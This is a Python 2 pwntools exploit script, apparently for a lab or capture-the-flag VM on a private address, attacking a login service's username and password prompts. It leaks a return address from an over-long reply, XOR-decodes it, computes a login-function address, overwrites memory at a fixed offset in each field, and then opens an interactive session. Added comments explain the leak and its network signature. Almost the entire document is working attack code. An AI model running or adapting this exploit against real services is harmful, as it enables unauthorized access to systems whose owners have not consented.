
from pwn import *


import struct

# Connection to the target service. 192.168.56.0/24 is a private (RFC 1918)
# range, i.e. this was run against a local VM rather than a public host.
conn = remote('192.168.56.104',6642)

# Last reply line read from the service; re-assigned every round below.
data = ''

# Per-round login fields. Bound here so the send/log lines inside the loop
# always have a value even on a round that does not set them.
username = ''
password = ''


def xoraddr(addr,val):
    """Return `addr` (a '0x'-prefixed hex string) with each byte XOR-ed by the integer `val`.

    Walks `addr` two characters at a time; the `x != 0` filter drops the
    leading '0x' pair, and every remaining pair is parsed as one byte,
    XOR-ed with `val`, and re-emitted through hex() with its own '0x'
    sliced off. The joined digits are re-prefixed with '0x' so the result
    can go straight back into int(..., 16), which is how the callers use it.

    NOTE(review): hex() does not zero-pad, so a byte whose XOR result is
    below 0x10 contributes a single digit, and an odd-length `addr` (hex()
    of a value whose top nibble is zero) shifts every pair boundary; neither
    case is handled here. xrange marks this as Python 2 code, consistent
    with the print statements elsewhere in the file.
    """
    result = '0x'+''.join([hex(int("0x"+addr[x:x+2],16) ^ val)[2::] for x in xrange(0,len(addr),2) if x != 0])
    return result

# Three rounds against the service's login prompt, counted down by `i` (3 -> 1):
#   i == 3: 32-byte filler in both fields; bytes 116..120 of the reply line are
#           read back as a 4-byte value (logged as "Leaked code section => RET");
#   i == 2: the same filler with two values derived in round 1 spliced in at
#           offset 20 of each field;
#   i == 1: the connection is handed to the user via conn.interactive().
# The paste lost all indentation; the nesting below is reconstructed from the
# control flow and is a judgement call where marked.
# NOTE(defense): what the script depends on is visible in round 1 -- a reply
# to a 32-byte username/password that is at least 120 bytes long, presumably
# carrying bytes past the submitted input. A reply bounded to the submitted
# length would never reach `ret`; repeated 32-byte "A"/"B" fields at 1 s
# spacing are also the recognizable on-the-wire shape of this run.
val = 0x03      # per-byte XOR key handed to xoraddr(); never changes

i = 3
while(i > 0):

    if i == 3:
        # Round 1: plain filler, 32 bytes per field.
        username = "A" *32
        password = "B" *32
        val = 0x03      # redundant with the assignment above the loop

    if i == 2:
        # Round 2: the two hex strings computed at the end of round 1 are
        # packed with p32 (little-endian under pwntools' default context)
        # into offset 20..24 of each 32-byte field. Both names are bound
        # only by the `if i == 3:` branch further down.
        username = "A"*20+p32(int(unxored_leak,16))+"A"*8
        password = "B"*20+p32(int(unxored_login,16))+"B"*8
    if i == 1:
        # Round 3: drop to an interactive session. conn.interactive()
        # presumably blocks until the user leaves it, so the prompt handling
        # below runs only afterwards in this round.
        conn.interactive()

    # Drive the two prompts. `print` as a statement pins this to Python 2;
    # `time` and `log` come in through `from pwn import *`.
    print conn.readuntil("Enter your username:")
    log.info("Sending %s username",username)
    time.sleep(1)
    conn.sendline(username)

    print conn.readuntil("Enter your password:")
    log.info("Sending %s password",password)
    conn.sendline(password)
    time.sleep(1)

    # One reply line per round; only its length and bytes 116..120 are used.
    data = conn.readuntil('\n')

    if len(data) >=120:
        ret = data[116:120]     # 4 bytes at a fixed offset in the reply

    # Reconstructed at loop-body level rather than inside the length check
    # (the paste does not show which). As written, a round-1 reply shorter
    # than 120 bytes leaves `ret` unbound and the next line raises NameError.
    if i == 3:
        log.info("Leaked code section => RET %s:", hex(u32(ret)))
        # XOR each byte of the unpacked value with `val` (0x03), then subtract
        # 1162 and run the result through xoraddr() again. The log labels the
        # second value the "login addr"; that meaning is not derivable here.
        unxored_leak = xoraddr(hex(u32(ret)),val)
        log.info("Unxored leak RET: %s",unxored_leak)
        unxored_login = xoraddr(hex(int(unxored_leak,16)-1162),val)
        log.info("Unxored login addr %s",unxored_login)


    i -= 1
conn.close()